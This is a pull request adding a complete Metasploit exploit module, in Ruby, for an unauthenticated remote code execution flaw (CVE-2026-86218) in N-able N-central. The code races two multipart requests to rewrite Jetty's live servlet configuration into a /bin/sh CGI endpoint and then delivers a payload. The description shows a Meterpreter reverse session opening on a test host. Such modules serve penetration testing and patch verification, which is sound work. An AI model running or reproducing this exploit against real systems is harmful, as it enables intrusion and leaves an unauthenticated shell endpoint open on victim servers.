### PR TITLE
Add exploit module for N-able N-central unauthenticated  RCE (CVE-2026-86218)

### DIFF
--- a/modules/exploits/linux/http/nable_ncentral_unauth_rce_cve_2026_86218.rb
+++ b/modules/exploits/linux/http/nable_ncentral_unauth_rce_cve_2026_86218.rb
@@ -1,0 +1,426 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'N-able N-central Struts BeanUtils Unauthenticated RCE',
+        'Description' => %q{
+          N-able N-central before 2026.3.1.14 uses a session-scoped Struts form on
+          an unauthenticated action. Two concurrent multipart requests can race the
+          form's multipart handler and expose Jetty's live configuration to Commons
+          BeanUtils property population.
+
+          This module changes a lazy N-central servlet holder into Jetty's bundled
+          CGI servlet, configures it to invoke /bin/sh, and sends a command payload
+          through the holder's existing URL mapping. The selected N-central servlet
+          (e.g. LogRetrieval) remains unavailable and its URL remains an
+          unauthenticated CGI endpoint until the web application or appliance is
+          restarted.
+        },
+        'Author' => [
+          'sfewer-r7' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-86218'],
+          ['URL', 'https://me.n-able.com/s/security-advisory/aArVy0000002Ld3KAE/cve202686218-preauthentication-remote-code-execution'],
+          ['URL', 'https://documentation.n-able.com/N-central/Release_Notes/GA/Content/N-central_2026.3_HF4_Release_Notes.htm']
+        ],
+        'DisclosureDate' => '2026-09-05',
+        'Privileged' => false, # Executes as user 'nable'
+        'Targets' => [
+          [
+            # Successfully tested against the following versions:
+            # * N-central 2025.4.1.2
+            # * N-central 2026.3.1.13
+            #
+            # Successfully tested with the following payloads:
+            # * cmd/linux/http/x64/meterpreter/reverse_tcp
+            # * cmd/unix/reverse_bash
+            'Linux Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => [ARCH_CMD]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true,
+          # N-central mounts /tmp with noexec. Fetch payloads therefore use a
+          # Python memfd by default; this product-owned directory is the
+          # executable fallback when an operator sets FETCH_FILELESS to none.
+          'FETCH_FILELESS' => 'python3.8+',
+          'FETCH_WRITABLE_DIR' => '/var/opt/n-central/tmp',
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          # Replacing the live Jetty holder is both a configuration change and
+          # the loss of the selected servlet's normal service until restart.
+          'Stability' => [CRASH_SAFE, SERVICE_RESOURCE_LOSS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The N-central base path', '/']),
+        OptEnum.new(
+          'SERVLET',
+          [
+            true,
+            'The lazy servlet holder to replace until N-central restarts',
+            'LogRetrieval',
+            ['LogRetrieval', 'FileTransfer', 'AutomationManagerDownloadServlet']
+          ]
+        )
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptFloat.new('RACE_DELAY', [true, 'Delay after pausing the first request before sending the helper request', 0.35])
+      ]
+    )
+  end
+
+  def check
+    # Omitting the action's required method makes N-central render its standard
+    # system-error component. That response includes the product version and is
+    # available without authentication on the same listener used by the
+    # exploit. It creates an ordinary HTTP session but does not mutate Jetty.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => action_uri
+    )
+
+    return CheckCode::Unknown("No response from #{action_uri}.") unless res
+
+    error_info = res.get_html_document.at_xpath('//*[@data-dojo-props]/@data-dojo-props')&.value
+
+    unless error_info&.start_with?("errorInfo:'") && error_info.end_with?("'")
+      return CheckCode::Unknown("The response from #{action_uri} did not identify N-central.")
+    end
+
+    # data-dojo-props wraps JSON in errorInfo:'...'; it is not itself a JSON
+    # document. Remove only that fixed wrapper, then let the JSON parser extract
+    # the version rather than matching inside serialized JSON with a regexp.
+    begin
+      error_data = JSON.parse(error_info.delete_prefix("errorInfo:'").delete_suffix("'"))
+    rescue JSON::ParserError
+      return CheckCode::Detected('N-central returned malformed system-error JSON, so its version could not be determined.')
+    end
+
+    version_string = error_data['version'] if error_data.is_a?(Hash)
+
+    unless version_string.is_a?(String) && version_string.present?
+      return CheckCode::Detected('N-central detected, but its system-error metadata did not contain a usable version.')
+    end
+
+    begin
+      version = Rex::Version.new(version_string)
+    rescue ArgumentError
+      return CheckCode::Detected("N-central reported an invalid version string: #{version_string.inspect}.")
+    end
+
+    return CheckCode::Safe("N-central #{version} is not affected.") if version >= Rex::Version.new('2026.3.1.14')
+
+    CheckCode::Appears("N-central #{version} is affected.")
+  end
+
+  def exploit
+    # Exploitation overview:
+    #
+    # The unauthenticated Struts action gives us a normal JSESSIONID. Two
+    # requests with that cookie share one session-scoped form. The slow request
+    # stops partway through multipart parsing, after Struts clears the form's
+    # multipart handler. A complete helper request then installs its initialized
+    # handler, containing live servlet references, on the shared form. When the
+    # slow request resumes, BeanUtils follows attacker-controlled field names
+    # through that handler and into Jetty's live WebAppContext.
+    #
+    # Those fields replace a not-yet-initialized N-central servlet with Jetty's
+    # CGI servlet and configure it to run /bin/sh -s. A final POST supplies the
+    # command payload on the shell's standard input. This change cannot be
+    # restored in-band because Jetty retains the instantiated CGI object. The
+    # selected feature remains disabled and its URL remains an unauthenticated
+    # command endpoint until N-central or the appliance is restarted.
+    race_delay = datastore['RACE_DELAY']
+
+    fail_with(Failure::BadConfig, 'RACE_DELAY must be greater than zero.') unless race_delay.positive?
+
+    # The holder name and URL stem are identical for two choices, but
+    # AutomationManagerDownloadServlet is mapped below AutomationManagerDownload.
+    trigger_paths = {
+      'LogRetrieval' => 'LogRetrieval/WEB-INF/web.xml',
+      'FileTransfer' => 'FileTransfer/WEB-INF/web.xml',
+      'AutomationManagerDownloadServlet' => 'AutomationManagerDownload/WEB-INF/web.xml'
+    }
+
+    servlet = datastore['SERVLET']
+
+    trigger_path = trigger_paths.fetch(servlet)
+
+    # LogRetrieval is the best default: it has the required wildcard mapping,
+    # is reachable without authentication on the public listener, and is
+    # normally initialized only by an uncommon log-capture operation.
+    # FileTransfer is also reachable on the public listener but exploiting it
+    # disrupts file transfers. AutomationManagerDownloadServlet generally
+    # requires the configurable management UI listener. Download has a suitable
+    # wildcard mapping, but normal traffic initialized it after a clean reboot,
+    # so it cannot be replaced reliably. Other candidates are initialized during
+    # startup, lack a wildcard mapping, or have incompatible authentication or
+    # filter behavior. Whichever holder is selected remains changed until restart.
+    if servlet == 'AutomationManagerDownloadServlet'
+      print_warning('AutomationManagerDownloadServlet normally requires the configured management UI listener; set RPORT to that listener (port 8443 by default).')
+    end
+
+    # Resolve the final command before changing Jetty so a payload-generation
+    # failure cannot leave the target mutated without reaching the CGI trigger.
+    marker = rand_text_hex(16)
+
+    # The random marker shows that the CGI shell processed this request; the
+    # resulting session or payload behavior remains the proof that the payload
+    # itself succeeded. Run it in a background subshell and disconnect all three
+    # standard streams from CGI. Backgrounding alone is insufficient because a
+    # session process would retain Jetty's response pipe and keep the HTTP
+    # request open until it timed out. The CGI shell can now emit the marker and
+    # exit immediately while the payload continues independently.
+    cgi_body = <<~SH
+      printf 'Content-Type: text/plain\\r\\n\\r\\n'
+      (#{payload.encoded}) </dev/null >/dev/null 2>&1 &
+      printf '#{marker}\\n'
+    SH
+
+    print_warning("#{servlet} will remain an unauthenticated CGI endpoint until N-central is restarted.")
+
+    session_cookie = new_session
+
+    # Why the two requests must overlap:
+    #
+    # Struts stores one form object in this HTTP session, so both requests edit
+    # the same object. At the start of a multipart request, Struts removes the
+    # form's multipart handler. It does not put the request's new handler back
+    # until after BeanUtils has processed the submitted fields. A request
+    # therefore cannot use its own handler to reach Jetty.
+    #
+    # The first request stops while Struts is still reading its body. While it
+    # waits, the helper request finishes and puts its initialized handler into
+    # the shared form. When the first request continues, BeanUtils finds the
+    # helper's handler and follows the crafted field names through it into
+    # Jetty's live configuration.
+    #
+    # The padding prefix stays in the range that proved reliable during testing.
+    # The random suffix leaves every mutation field unsent while parsing is
+    # blocked. Hexadecimal padding has the requested exact length and cannot
+    # contain Rex::MIME's hyphen-prefixed numeric boundary. The complete body
+    # also stays below Struts' 128 KiB in-memory upload threshold.
+    padding_prefix_size = rand(48 * 1024..72 * 1024)
+
+    padding_suffix_size = rand(8 * 1024..16 * 1024)
+
+    padding = rand_text_hex(padding_prefix_size + padding_suffix_size)
+
+    multipart = Rex::MIME::Message.new
+
+    # No field initializes CGI and each field changes an independent holder or
+    # filter property, so their order is immaterial. Shuffling avoids a fixed
+    # wire layout without changing the race.
+    [[rand_text_hex(16), padding], *cgi_mutation_fields(servlet).shuffle].each do |name, value|
+      multipart.add_part(value, nil, nil, "form-data; name=\"#{name}\"")
+    end
+
+    body = multipart.to_s
+
+    fail_with(Failure::BadConfig, "The generated multipart body is too large (#{body.bytesize} bytes).") if body.bytesize >= 128 * 1024
+
+    # Locate the padding in the rendered MIME body instead of assuming the size
+    # of its random boundary and part headers. This keeps the split after the
+    # chosen number of padding bytes even if Rex changes either one.
+    padding_offset = body.index(padding)
+
+    fail_with(Failure::Unknown, 'The generated padding was not found in the multipart body.') unless padding_offset
+
+    body_split_offset = padding_offset + padding_prefix_size
+
+    slow_client = connect
+
+    slow_request = slow_client.request_cgi(
+      'method' => 'POST',
+      'uri' => action_uri,
+      'ctype' => "multipart/form-data; boundary=#{multipart.bound}",
+      'cookie' => session_cookie,
+      'data' => body
+    )
+
+    serialized_request = slow_request.to_s
+
+    # The byte split below is valid only if request_cgi appended the MIME body
+    # verbatim. Refuse to send a partial request if a future HTTP client change
+    # transforms or relocates it.
+    fail_with(Failure::Unknown, 'The HTTP client did not preserve the generated multipart body.') unless serialized_request.end_with?(body)
+
+    # request_cgi prepends the HTTP request line and headers. Translate the
+    # body-relative split into the serialized request rather than assuming how
+    # many bytes those headers occupy.
+    request_body_offset = serialized_request.bytesize - body.bytesize
+
+    request_split_offset = request_body_offset + body_split_offset
+
+    # HttpClientTimeout may be nil because send_request_cgi normally supplies
+    # its 20-second default. This raw client path bypasses that wrapper, so it
+    # must apply the same default when the option is unset or non-positive.
+    request_timeout = datastore['HttpClientTimeout']
+
+    request_timeout = 20 unless request_timeout&.positive?
+
+    vprint_status("Holding the multipart request after #{padding_prefix_size} of #{padding.bytesize} padding bytes.")
+
+    begin
+      slow_client.connect(request_timeout)
+
+      # Content-Length describes the complete body, but only this prefix is
+      # sent. Jetty begins parsing, Struts clears multipartRequestHandler, and
+      # the multipart parser blocks waiting for the advertised remainder.
+      slow_client.conn.put(serialized_request.byteslice(0, request_split_offset))
+
+      Rex.sleep(race_delay)
+
+      # send_request_cgi deliberately creates a second connection. Its
+      # vars_form_data support uses Rex::MIME internally; the random field is
+      # not a property on the form and is harmless. Waiting for the response
+      # guarantees Struts has attached this request's wired handler to the
+      # shared form before the slow request resumes. Its eventual HTTP status is
+      # irrelevant because attachment happens during population, before the
+      # action runs.
+      helper_res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => action_uri,
+        'cookie' => session_cookie,
+        'vars_form_data' => [
+          {
+            'name' => rand_text_hex(16),
+            'data' => rand_text_hex(2)
+          }
+        ]
+      )
+
+      fail_with(Failure::Unreachable, 'The helper multipart request did not receive a response.') unless helper_res
+
+      # The remaining bytes contain every mutation field. BeanUtils now sees
+      # the helper's handler instead of nil and follows those fields into Jetty.
+      slow_client.conn.put(serialized_request.byteslice(request_split_offset..))
+
+      mutation_res = slow_client.read_response(request_timeout, original_request: slow_request)
+
+      fail_with(Failure::Unreachable, 'The servlet mutation request did not receive a response.') unless mutation_res
+
+      fail_with(Failure::UnexpectedReply, "The servlet mutation failed with HTTP #{mutation_res.code}.") if mutation_res.code >= 500
+    rescue Rex::ConnectionError, ::Errno::EPIPE, ::IOError, ::Timeout::Error => e
+      fail_with(Failure::Unreachable, "The multipart race failed: #{e.message}")
+    ensure
+      slow_client.close
+    end
+
+    print_status('The multipart race completed without a server error.')
+
+    # WEB-INF/web.xml is an existing resource that satisfies CGI's file lookup.
+    # The command prefix makes /bin/sh read cgi_body from standard input; Jetty
+    # does not execute the contents of web.xml.
+    print_status("Sending the payload through #{servlet}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, trigger_path),
+      'ctype' => 'text/plain',
+      'data' => cgi_body
+    )
+
+    if res&.body&.include?(marker)
+      print_good('The CGI shell launched the payload command.')
+    elsif res&.code && res.code >= 500
+      print_warning("The CGI trigger returned HTTP #{res.code}; no command completion marker was received.")
+    else
+      print_warning('No CGI command completion marker was received.')
+    end
+
+    print_warning("Restart N-central to restore #{servlet} and remove the CGI endpoint.")
+  end
+
+  private
+
+  def action_uri
+    normalize_uri(target_uri.path, 'remoteControlAction.do')
+  end
+
+  def new_session
+    # This is the attacker's own unauthenticated session, not a stolen or
+    # predicted session. Its only purpose is to make both requests share the
+    # same vulnerable Struts form object. Always request a fresh cookie here:
+    # AutoCheck is optional and its earlier check request does not retain one.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => action_uri
+    )
+
+    fail_with(Failure::Unreachable, 'The unauthenticated action did not respond.') unless res
+
+    session_cookie = res.get_cookies[/\bJSESSIONID=[^;\s]+/]
+
+    fail_with(Failure::UnexpectedReply, "No JSESSIONID was returned by #{action_uri} (HTTP #{res.code}).") unless session_cookie
+
+    session_cookie
+  end
+
+  def cgi_mutation_fields(servlet)
+    # Struts passes multipart field names to BeanUtils as JavaBean property
+    # paths. Each dotted component invokes a getter on a live object; the last
+    # component invokes a setter. The root below walks from the helper request's
+    # multipart handler to Jetty's live WebAppContext; the next two strings
+    # extend it to the selected servlet holder.
+    context = 'multipartRequestHandler.servlet.servletContext.classLoader.context'
+
+    handler = "#{context}.servletHandler"
+
+    holder = "#{handler}.servlet(#{servlet})"
+
+    # These pairs are ordinary multipart names and values, not direct Jetty API
+    # calls. For example, a name ending in servlet(<name>).heldClass makes
+    # BeanUtils call getters until it reaches that live holder, then invoke
+    # setHeldClass(). Because the selected holder has not created its original
+    # servlet yet, the later trigger causes it to instantiate CGI instead.
+    #
+    # The singular initParameter(name) paths deliberately call Jetty's typed
+    # setter. Struts stores multipart text as String arrays; BeanUtils converts a
+    # one-element array for that setter, whereas writing the backing map would
+    # retain the array and later fail Jetty's String cast. commandPrefix starts a
+    # shell that reads the trigger body, while cgibinResourceBaseIsRelative makes
+    # CGI find WEB-INF/web.xml relative to the web-application root.
+    #
+    # CGI calls startAsync(), so its holder and both /* filters must permit
+    # asynchronous processing. These flags do not remove or bypass the filters;
+    # the filters continue operating normally with async support enabled. Their
+    # asyncSupported settings also remain changed until N-central restarts.
+    [
+      ["#{holder}.heldClass", 'org.eclipse.jetty.servlets.CGI'],
+      ["#{holder}.initParameter(commandPrefix)", '/bin/sh -s'],
+      ["#{holder}.initParameter(cgibinResourceBaseIsRelative)", 'true'],
+      ["#{holder}.asyncSupported", 'true'],
+      ["#{handler}.filter(HeaderFilter).asyncSupported", 'true'],
+      ["#{handler}.filter(Mapped Diagnostic Context Filter).asyncSupported", 'true']
+    ]
+  end
+end


### PR DESCRIPTION
## Overview

This ~(draft)~ pull request adds an exploit module for CVE-2026-86218, unauthenticated RCE against N-able N-central versions `2026.3.1.13` and below.

Successfully tested against the following versions:
* N-central `2025.4.1.2`
* N-central `2026.3.1.13`

A vendor supplied patch, version `2026.3.1.14`, is available and has been verified to successfully break this exploit.

## To-Do:

- [x] The current module replaces a lazy N-central servlet holder with Jetty's bundled CGI servlet. The CGI object remains live after the command finishes, leaving the selected N-central feature unavailable and its URL mapping capable of executing further unauthenticated commands. Currently the module will not revert this, but we have a few options to do so:
  - Restart Jetty. This is nice and straightforward, we can do it on the command line (and that fits nicely with ARCH_CMD), but restarting Jetty is pretty obtuse.
  - Run some custom cleanup code inside the Jetty process and restore the modified servlet holder.
- [x] ~If above doesn't work out, add in a "defanged mode" as we leave a Servlet in an unexpected state that may unexpectedly alter server behavior.~
- [x] The module can only replace the servlet holder if that servlet has not already been loaded by N-central, so YMMV. We have a few servlets to choose from that are good candidates (i.e. less likely to have been used than others). Some more investigation into detecting viable candidates at runtime would be nice. 
- [x] Documentation.

## Example

```
msf > use exploit/linux/http/nable_ncentral_unauth_rce_cve_2026_86218 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/http/nable_ncentral_unauth_rce_cve_2026_86218) > set RHOSTS 192.168.86.14
RHOSTS => 192.168.86.14
msf exploit(linux/http/nable_ncentral_unauth_rce_cve_2026_86218) > set LHOST eth0
LHOST => 192.168.86.122
msf exploit(linux/http/nable_ncentral_unauth_rce_cve_2026_86218) > check
[+] 192.168.86.14:443 - The target appears to be vulnerable. N-central 2026.3.1.13 is affected.
msf exploit(linux/http/nable_ncentral_unauth_rce_cve_2026_86218) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. N-central 2026.3.1.13 is affected.
[!] LogRetrieval will remain an unauthenticated CGI endpoint until N-central is restarted.
[*] The multipart race completed without a server error.
[*] Sending the payload through LogRetrieval
[+] The CGI shell launched the payload command.
[!] Restart N-central to restore LogRetrieval and remove the CGI endpoint.
[*] Sending stage (3106788 bytes) to 192.168.86.14
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.14:17078) at 2026-09-10 19:05:39 +0100

meterpreter > getuid
Server username: nable
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 9.7 (Linux 5.14.0-611.54.3.el9_7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > cat /etc/n-central-release 
2026.3.1.13
meterpreter >
```